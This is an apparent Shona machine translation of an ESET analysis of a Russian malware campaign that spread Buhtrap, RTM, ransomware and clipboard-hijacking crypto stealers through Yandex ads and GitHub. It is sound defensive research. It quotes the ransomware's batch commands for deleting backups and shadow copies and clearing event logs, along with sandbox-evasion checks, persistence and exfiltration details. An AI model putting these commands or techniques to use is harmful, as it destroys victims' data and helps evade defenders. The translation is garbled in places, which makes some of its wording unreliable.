Kuti utarise maakaunti mukurwisa kwe cyber, unogona kushandisa magwaro ebasa avanotsvaga pamhepo. Izvi ndizvo zvanga zvichiitwa neboka re cyber mumwedzi mishoma yadarika, kugovera kuseri kunozivikanwa. ΠΈ , pamwe ne encryptors uye software yekuba cryptocurrencies. Zvinangwa zvakawanda zviri muRussia. Kurwiswa kwacho kwakaitwa nekuisa kushambadzira kwakashata paYandex.Direct. Vangangove vakabatwa vakaendeswa kune webhusaiti kwavakakumbirwa kuti vatore faira rakashata rakavanzwa segwaro template. Yandex yakabvisa kushambadza kwakashata mushure meyambiro yedu.
Buhtrap's source code yakaburitswa online munguva yakapfuura kuti chero munhu aishandise. Isu hatina ruzivo nezve RTM kodhi kuwanikwa.
Muchinyorwa ichi tichakuudza kuti vanorwisa vakagovera sei malware vachishandisa Yandex.Direct uye vakaibata paGitHub. Iyo positi inozopedzisa nekuongororwa kwehunyanzvi kweiyo malware.
Bhutrap neRTM vadzoka mubhizinesi
Mechanism yekuparadzira uye vakakuvadzwa
Iyo mihoro yakasiyana-siyana inounzwa kune vakabatwa inogovera nzira yakafanana yekuparadzira. Ese mafaera akashata akagadzirwa nevanorwisa akaiswa mune maviri akasiyana GitHub repositori.
Kazhinji, iyo repository yaive nefaira rimwechete raigona kurodha, iro raichinja kazhinji. Sezvo GitHub ichikubvumidza kuti utarise nhoroondo yekuchinja kune repository, isu tinogona kuona iyo malware yakagoverwa panguva yakati. Kunyengetedza munhu akabatwa kuti atore faira rakashata, webhusaiti blanki-shabloni24[.]ru, inoratidzwa mumufananidzo uri pamusoro, yakashandiswa.
Kugadzirwa kwesaiti uye mazita ese emafaira ane hutsinye anotevera pfungwa imwechete - mafomu, matemplate, zvibvumirano, samples, nezvimwe. Tichifunga kuti Buhtrap neRTM software yakatoshandiswa mukurwiswa kweakaunti munguva yakapfuura, takafunga kuti zano mumushandirapamwe mutsva rakafanana. Mubvunzo chete ndewekuti munhu akabatwa akasvika sei pawebhusaiti yevanorwisa.
Kurwara
Vanenge vanoverengeka vangangove vakabatwa pasaiti ino vakakwezvwa nekushambadza kwakashata. Pazasi pane muenzaniso URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ΡΠΊΠ°ΡΠ°ΡΡ Π±Π»Π°Π½ΠΊ ΡΡΠ΅ΡΠ°&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Sezvauri kuona kubva pane chinongedzo, banner rakaiswa pane yepamutemo accounting forum bb.f2[.]kz. Zvakakosha kucherechedza kuti mabhana aionekwa panzvimbo dzakasiyana, ese aive ned yedanidziro imwechete (blanki_rsya), uye mazhinji ane chekuita neakaunzi kana rubatsiro rwemutemo. Iyo URL inoratidza kuti angave akabatwa akashandisa chikumbiro "kudhawunirodha invoice fomu," iyo inotsigira pfungwa yedu yekurwiswa kwakanangwa. Pazasi pane mawebhusaiti akaonekwa mabhana uye mibvunzo inoenderana yekutsvaga.
- dhawunirodha invoice fomu - bb.f2[.]kz
- chibvumirano chemuenzaniso - Ipopen[.]ru
- chikumbiro chichemo sampuro - 77metrov[.]ru
- fomu yechibvumirano - blank-dogovor-kupli-prodazhi[.]ru
- sampuli chikumbiro chedare - zen.yandex[.]ru
- muenzaniso chichemo - yurday[.]ru
- sampuli mafomu echibvumirano - Regforum[.]ru
- fomu rechibvumirano - assistentus[.]ru
- muenzaniso chibvumirano chefurati - ββnapravah[.]com
- sampuli dzezvibvumirano zvepamutemo - avito[.]ru
Iyo blanki-shabloni24[.]ru saiti inogona kunge yakagadziridzwa kuti ipfuure yakareruka yekuona kuongorora. Kazhinji, kushambadzira kunongedza kune inotaridzika saiti ine chinongedzo kuGitHub haiite sechinhu chakashata. Pamusoro pezvo, vapambi vakaisa mafaera akashata kunzvimbo inochengeterwa chete kwenguva shoma, pamwe panguva yemushandirapamwe. Kazhinji yenguva, GitHub repository yaive isina zip archive kana isina EXE faira. Saka, vapambi vaigona kugovera kushambadza kuburikidza neYandex.Direct pamasaiti angangove akashanyirwa nemaakaunti akauya achipindura mibvunzo yekutsvaga chaiyo.
Tevere, ngatitarisei mitoro yakasiyana-siyana yakagoverwa nenzira iyi.
Payload Analysis
Nguva yekugovera
Mushandirapamwe wakashata wakatanga mukupera kwaGumiguru 2018 uye unoshanda panguva yekunyora. Sezvo nzvimbo yese yaiwanikwa pachena paGitHub, takanyora rondedzero chaiyo yenguva yekugoverwa kwemhuri nhanhatu dzakasiyana dzemalware (ona mufananidzo uri pazasi). Isu tawedzera mutsara unoratidza pakawanikwa banner link, sekuyerwa neESET telemetry, kuenzanisa negit nhoroondo. Sezvauri kuona, izvi zvinopindirana zvakanaka nekuwanikwa kwemubhadharo paGitHub. Kusiyana pakupera kwaFebruary kunogona kutsanangurwa nenyaya yekuti isu takanga tisina chikamu chekuchinja kwenhoroondo nekuti repository yakabviswa kubva kuGitHub tisati tawana zvizere.
Mufananidzo 1. Chronology yekugovera malware.
Code Signing Certificates
Mushandirapamwe wakashandisa zvitupa zvakawanda. Mamwe akasainwa nemhuri inopfuura imwe malware, izvo zvakare zvinoratidza kuti masampuli akasiyana aive emushandirapamwe mumwechete. Kunyangwe kuvepo kwekiyi yakavanzika, vashandisi havana kusaina zvakarongeka mabhinari uye havana kushandisa kiyi yemasampuli ese. Mukupera kwaKukadzi 2019, vapambi vakatanga kugadzira masiginecha asiri iwo vachishandisa chitupa cheGoogle chavakange vasina kiyi yakavanzika.
Zvese zvitupa zvine chekuita nemushandirapamwe uye mhuri dzemalware dzavanosaina dzakanyorwa patafura pazasi.
Isu takashandisawo zvitupa izvi zvekusaina kodhi kumisikidza zvinongedzo nedzimwe mhuri dzine malware. Kune akawanda zvitupa, isu hatina kuwana masampuli asina kugoverwa kuburikidza neGitHub repository. Nekudaro, chitupa cheTOV "MARIYA" chakashandiswa kusaina malware ye botnet , adware uye miners. Hazvigoneki kuti iyi malware ine chekuita nemushandirapamwe uyu. Zvingangodaro, chitupa chakatengwa padarknet.
Win32/Filecoder.Buhtrap
Chinhu chekutanga chakabata pfungwa dzedu yaive ichangobva kuwanikwa Win32/Filecoder.Buhtrap. Iri ibhinari reDelphi iro dzimwe nguva rinoiswa mukati. Yakanyanya kugoverwa muna Kukadzi-Kurume 2019. Inoita sezvinokodzera chirongwa cherudzikinuro - inotsvaga madhiraivha emunharaunda uye network maforodha uye encrypts mafaera akaonekwa. Iyo haidi chinongedzo cheInternet kuti chikanganiswe nekuti haibate sevha kuti itumire makiyi encryption. Pane kudaro, inowedzera "chiratidzo" kusvika pakuguma kwemashoko erudzikinuro, uye inokurudzira kushandisa email kana Bitmessage kuti ubate vashandi.
Kuti encrypt yakawanda inonzwisisika zviwanikwa sezvinobvira, Filecoder.Buhtrap inomhanyisa tambo yakagadzirirwa kuvhara kiyi software inogona kunge yakavhurika mafaira ekubata ane ruzivo rwakakosha runogona kukanganisa encryption. Matanho anotariswa anonyanya kukoshesa dhatabhesi manejimendi masisitimu (DBMS). Mukuwedzera, Filecoder.Buhtrap inobvisa mafaira ezvinyorwa uye mabhakiti kuitira kuti kudzosa data kuome. Kuti uite izvi, mhanyisa batch script pazasi.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap inoshandisa iri pamutemo yepamhepo IP Logger sevhisi yakagadzirirwa kuunganidza ruzivo nezve vashanyi vewebhusaiti. Izvi zvakaitirwa kuteedzera vakabatwa neiyo ransomware, rinova basa remutsara wekuraira:
mshta.exe "javascript:document.write('');"
Mafaira ekuvharidzira anosarudzwa kana asingaenderane nematatu ekusiya rondedzero. Chekutanga, mafaira ane zvinyorwa zvinotevera haana encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys uye .bat. Kechipiri, mafaera ese ane nzira yakazara ine dhairekitori tambo kubva pane iyo rondedzero pazasi haana kubatanidzwa.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Chechitatu, mamwe mazita emafaira haanawo kuverengerwa mu encryption, pakati pavo zita refaira remeseji yerudzikinuro. Rondedzero iri pasi apa. Zviripachena, zvese izvi zvakasarudzika zvakagadzirirwa kuchengetedza muchina uchishanda, asi nekushomeka kwemugwagwa.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Faira encryption scheme
Kana yangoitwa, iyo malware inogadzira 512-bit RSA kiyi pairi. Iyo yakavanzika exponent (d) uye modulus (n) inobva yavharidzirwa neakaomeswa-coded 2048-bit public kiyi (public exponent uye modulus), zlib-yakazara, uye base64 encoded. Kodhi inokonzeresa izvi inoratidzwa muMufananidzo 2.
Mufananidzo 2. Mhedzisiro yeHex-Rays decompilation ye512-bit RSA key pair generation process.
Pazasi pane muenzaniso wemavara akajeka ane kiyi yakagadzirwa yakavanzika, inova chiratidzo chakanamirwa kune rudzikinuro meseji.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Makiyi evapambi anopihwa pazasi.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Mafaira akavharidzirwa achishandisa AES-128-CBC ine 256-bit kiyi. Kune imwe neimwe faira yakavharidzirwa, kiyi nyowani uye nyowani yekutanga vector inogadzirwa. Ruzivo rwakakosha rwunowedzerwa kumagumo kweiyo encrypted faira. Ngatitarisei maitiro eiyo encrypted file.
Mafaira akavharidzirwa ane musoro unotevera:
Iyo sosi faira data nekuwedzera kweVEGA mashiripiti kukosha yakavharidzirwa kune yekutanga 0x5000 bytes. Yese decryption ruzivo rwakanamirwa kune faira rine inotevera chimiro:
- Iyo saizi yefaira marker ine mucherechedzo unoratidza kana iyo faira yakakura kupfuura 0x5000 bytes muhukuru.
- AES kiyi blob = ZlibCompress(RSAEncrypt(AES kiyi + IV, kiyi yeruzhinji yeakagadzirwa RSA kiyi peya))
-RSA kiyi blob = ZlibCompress(RSAEncrypt (yakagadzirwa RSA yakavanzika kiyi, yakaoma-coded RSA yeruzhinji kiyi))
Win32/ClipBanker
Win32/ClipBanker chikamu chakagovaniswa nguva nenguva kubva mukupera kwaGumiguru kusvika kutanga kwaZvita 2018. Basa rayo nderekutarisa zviri mukati me clipboard, inotsvaga kero dze cryptocurrency wallet. Yaona kero yewallet, ClipBanker inoitsiva nekero inofungidzirwa kuti ndeyevashandisi. Samples dzatakaongorora dzaive dzisina bhokisi kana kufuratirwa. Iyo chete nzira inoshandiswa kuvhara maitiro ndeye tambo encryption. Operator wallet kero dzakavharidzirwa uchishandisa RC4. Target cryptocurrencies iBitcoin, Bitcoin mari, Dogecoin, Ethereum uye Ripple.
Munguva iyo iyo malware yakanga ichipararira kune vanorwisa 'Bitcoin wallets, mari shoma yakatumirwa kuVTS, iyo inokanda kusava nechokwadi pamusoro pekubudirira kwemushandirapamwe. Pamusoro pezvo, hapana humbowo hunoratidza kuti kutengeserana uku kwakabatana neClipBanker zvachose.
Win32/RTM
Iyo Win32/RTM chikamu chakagoverwa kwemazuva akati wandei kutanga kwaKurume 2019. RTM iTrojan banker yakanyorwa muDelphi, yakanangwa kumabhanga ari kure. Muna 2017, vaongorori veESET vakaburitswa yechirongwa ichi, tsananguro ichiri kukosha. Muna Ndira 2019, Palo Alto Networks zvakare yakaburitswa .
Bhutrap Loader
Kwenguva yakati, yekudhawunirodha yaivepo paGitHub yakanga isina kufanana neyekare maturusi eBuhtrap. Anotendeukira kuna https://94.100.18[.]67/RSS.php?<some_id> kuti utore nhanho inotevera uye kuitakura zvakananga mundangariro. Tinogona kusiyanisa maitiro maviri echikamu chechipiri kodhi. Mu URL yekutanga, RSS.php yakapfuura Buhtrap backdoor zvakananga - iyi backdoor yakafanana neiyo inowanikwa mushure mekunge kodhi yekodhi yaburitswa.
Sezvineiwo, tinoona akati wandei macampaign neBuhtrap backdoor, uye anonzi anofambiswa nevashandisi vakasiyana. Muchiitiko ichi, mutsauko mukuru ndewekuti iyo backdoor inotakurwa yakananga mundangariro uye haishandise yakajairika chirongwa neiyo DLL yekuendesa maitiro yatakataura nezvayo. . Pamusoro pezvo, vashandisi vakachinja kiyi yeRC4 yakashandiswa encrypt network traffic kune C&C server. Mumishandirapamwe yakawanda yatakaona, vashandisi havana kunetseka nekuchinja kiyi iyi.
Chechipiri, maitiro akaomarara aive ekuti RSS.php URL yakapfuudzwa kune imwe loader. Yakaita imwe obfuscation, sekuvaka patsva tafura yekupinza. Chinangwa chebootloader ndechekubata C&C server [.]com/api/F27F84EDA4D13B15/2, tumira matanda uye umirire mhinduro. Inogadzirisa mhinduro senge blob, inoiisa mundangariro uye inozviita. Mubhadharo watakaona uchitakurisa uyu waive wakafanana Buhtrap backdoor, asi panogona kunge paine zvimwe zvinhu.
Android/Spy.Banker
Sezvineiwo, chikamu che Android chakawanikwa zvakare muGitHub repository. Aive mubazi guru kwezuva rimwe chete - Mbudzi 1, 2018. Kunze kwekutumirwa paGitHub, ESET telemetry haiwani humbowo hweiyi malware iri kugoverwa.
Chikamu chacho chakaitwa seAroid Application Package (APK). Zvakanyanya kufuratirwa. Hunhu hune hutsinye hwakavigwa mune yakavanzika JAR iri muAPK. Yakavharidzirwa neRC4 uchishandisa kiyi iyi:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Iyo imwechete kiyi uye algorithm inoshandiswa encrypt tambo. JAR inowanikwa mu APK_ROOT + image/files. Iwo ekutanga mabhayiti mana efaira ane kureba kweiyo encrypted JAR, iyo inotanga pakarepo mushure mekureba ndima.
Sezvo tabvisa faira, takaona kuti yaive Anubis - kare banker ye Android. Iyo malware ine zvinotevera maitiro:
- maikorofoni kurekodha
- kutora skrini
- kuwana GPS coordinates
- keylogger
- mudziyo wedata encryption uye rudzikinuro kudiwa
- kutumira spam
Sezvineiwo, mubhengi akashandisa Twitter senzira yekuchengetedza yekutaurirana kuti awane imwe C&C server. Muenzaniso watakaongorora wakashandisa @JonesTrader account, asi panguva yekuongorora yakanga yatovharwa.
Iyo bhengi ine runyorwa rwechinangwa chekushandisa pane Android mudziyo. Yakareba kupfuura rondedzero yakawanikwa muchidzidzo cheSophos. Rondedzero iyi inosanganisira akawanda ekubhengi kunyorera, online ekutenga zvirongwa zvakaita seAmazon neBay, uye cryptocurrency masevhisi.
MSIL/ClipBanker.IH
Chikamu chekupedzisira chakagoverwa sechikamu chemushandirapamwe uyu yaive .NET Windows inoteyerwa, iyo yakaonekwa munaKurume 2019. Mazhinji eshanduro dzakadzidzwa dzakaiswa muConfuserEx v1.0.0. Kufanana neClipBanker, chikamu ichi chinoshandisa clipboard. Chinangwa chake ndechekusiyana-siyana kwekristptocurrencies, pamwe chete nezvipo paSteam. Pamusoro pezvo, anoshandisa IP Logger sevhisi kuba iyo Bitcoin yakavanzika WIF kiyi.
Dziviriro Nzira
Pamusoro pezvakanakira izvo ConfuserEx inopa mukudzivirira debugging, kurasa, uye kukanganisa, chikamu ichi chinosanganisira kugona kuona antivirus zvigadzirwa uye chaiwo michina.
Kuti uone kuti inomhanya mumuchina chaiwo, iyo malware inoshandisa yakavakirwa-mukati Windows WMI yekuraira mutsara (WMIC) kukumbira ruzivo rweBIOS, rwunoti:
wmic bios
Ipapo chirongwa chinoparura kuburitsa kwemirairo uye chinotarisa mazwi akakosha: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Kuti uone zvigadzirwa zveantivirus, malware inotumira chikumbiro cheWindows Management Instrumentation (WMI) kuWindows Security Center uchishandisa. ManagementObjectSearcher API sezvakaratidzwa pasi apa. Mushure mekugadzirisa kubva pabase64 kufona kunoita seizvi:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Mufananidzo 3. Nzira yekuziva zvigadzirwa zveantivirus.
Mukuwedzera, iyo malware inotarisa kana , chishandiso chekudzivirira kubva ku clipboard kurwiswa uye, kana ichimhanya, inomisa tambo dzese mukuita ikoko, nekudaro ichidzima dziviriro.
Kushingirira
Iyo vhezheni yemalware yatakadzidza inozvikopa pachayo %APPDATA%googleupdater.exe uye inoseta iyo "yakavanzika" hunhu hweiyo google dhairekitori. Ipapo anoshandura kukosha SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell muWindows registry uye inowedzera nzira updater.exe. Nenzira iyi, iyo malware ichaitwa pese apo mushandisi anopinda.
Maitiro akashata
Kufanana neClipBanker, iyo malware inotarisisa zviri mukati me clipboard uye inotarisa cryptocurrency wallet kero, uye kana yawanikwa, inoitsiva neimwe yemakero emushandisi. Pazasi pane rondedzero yemakero anotangwa zvichienderana nezvinowanikwa mukodhi.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Pamhando yega yega yekero pane chirevo chenguva dzose chinoenderana. Iko STEAM_URL kukosha kunoshandiswa kurwisa Steam system, sezvinoonekwa kubva pakutaura kwenguva dzose kunoshandiswa kutsanangura mubuffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Exfiltration channel
Pamusoro pekutsiva kero mubuffer, iyo malware inotarisa zvakavanzika WIF makiyi eBitcoin, Bitcoin Core uye Electrum Bitcoin wallet. Chirongwa chinoshandisa plogger.org senzira yekuburitsa kuti uwane iyo WIF yakavanzika kiyi. Kuti uite izvi, vashandisi vanowedzera yakavanzika kiyi data kune Mushandisi-Agent HTTP musoro, sezvaratidzwa pazasi.
Mufananidzo 4. IP Logger console ine data yakabuda.
Vashandi havana kushandisa iplogger.org kuburitsa wallet. Vangangodaro vakashandisa imwe nzira nekuda kweiyo 255 hunhu muganho mumunda User-Agentinoratidzwa muIP Logger web interface. Mune sampuli dzatakadzidza, imwe sevha yekubuda yakachengetwa munzvimbo inoshanduka DiscordWebHook. Zvinoshamisa kuti iyi nharaunda inoshanduka haina kupihwa chero kupi mukodhi. Izvi zvinoratidza kuti iyo malware ichiri kugadziridzwa uye iyo vhezheni inopihwa kumuchina wekuyedza wemushandisi.
Pane chimwe chiratidzo chekuti chirongwa chiri mukuvandudzwa. Iyo bhinari faira inosanganisira maviri iplogger.org URLs, uye ese ari maviri anobvunzwa kana data yaburitswa. Muchikumbiro kune imwe yeaya maURL, kukosha muReferer ndima kunotungamirwa ne "DEV /". Isu takawana zvakare vhezheni yanga isina kurongedzerwa tichishandisa ConfuserEx, anogamuchira iyi URL anonzi DevFeedbackUrl. Zvichienderana neyakasiyana nharaunda zita, isu tinotenda kuti vashandisi vari kuronga kushandisa iyo iri pamutemo sevhisi Discord uye yayo yewebhu yekubikira system kuba mawallet e cryptocurrency.
mhedziso
Mushandirapamwe uyu muenzaniso wekushandiswa kwemasevhisi ekushambadzira ari pamutemo mukurwiswa kwecyber. Chirongwa chacho chakanangana nemasangano eRussia, asi isu hatingashamisi kuona kurwiswa kwakadaro tichishandisa mabasa asiri eRussia. Kuti udzivise kukanganisa, vashandisi vanofanirwa kuve nechivimbo mumukurumbira wekwakabva software yavanorodha.
Rondedzero yakazara yezviratidzo zvekukanganisika uye MITER ATT&CK hunhu inowanikwa pa .
Source: www.habr.com